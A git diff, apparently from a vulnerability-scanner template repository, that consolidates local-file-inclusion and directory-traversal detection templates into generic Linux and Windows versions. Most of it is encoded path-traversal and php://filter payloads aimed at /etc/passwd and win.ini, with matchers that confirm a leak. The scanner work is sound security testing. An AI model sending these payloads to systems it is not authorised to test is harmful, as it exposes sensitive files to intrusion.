moving files around

fuzzing/arbitrary-file-read.yaml

@@ -1,30 +0,0 @@
-id: arbitrary-file-read
-
-info:
-  name: Arbitrary File Read
-  author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble)
-  severity: high
-  description: Searches for /etc/passwd on passed URLs.
-  tags: fuzz,lfi
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
-      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-          - "\\[(font|extension|file)s\\]"
-        condition: or
-        part: body

fuzzing/directory-traversal.yaml

@@ -1,43 +0,0 @@
-id: directory-traversal
-
-info:
-  name: Generic Directory Traversal
-  author: pentest_swissky
-  severity: high
-  description: Detect basic directory traversal leading to a leak of sensitive files.
-  tags: lfi,fuzz
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
-      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
-      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
-      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
-      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
-      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body

vulnerabilities/generic/generic-linux-lfi.yaml

@@ -1,10 +1,11 @@
-id: generic-lfi-fuzzing
+id: generic-linux-lfi
+
 info:
-  name: Generic LFI Test
+  name: Generic Linux based LFI Test
-  author: geeknik,unstabl3
+  author: geeknik,unstabl3,pentest_swissky,sushantkamble
   severity: high
-  description: A generic test for Local File Inclusion
+  description:  Searches for /etc/passwd on passed URLs
-  tags: fuzz,lfi
+  tags: linux,lfi
 
 requests:
   - method: GET
@@ -19,6 +20,31 @@ requests:
       - "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
       - "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd"
       - "{{BaseURL}}/etc/passwd"
+      - "{{BaseURL}}/..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
+      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
+      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
+      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
+      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
     matchers:
       - type: regex
         words:

vulnerabilities/generic/generic-windows-lfi.yaml

@@ -1,10 +1,10 @@
-id: azure-directory-traversal
+id: generic-windows-lfi
 
 info:
-  name: Azure Directory Traversal
+  name: Generic Windows based LFI Test
-  author: mesaglio
+  author: mesaglio,sushantkamble
   severity: high
-  description: Detect azure directory traversal hosts file.
+  description:  Searches for /windows/win.ini on passed URLs
   tags: azure,windows,lfi
 
 requests:
@@ -17,13 +17,11 @@ requests:
       - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
       - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
       - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         words:
           - "bit app support"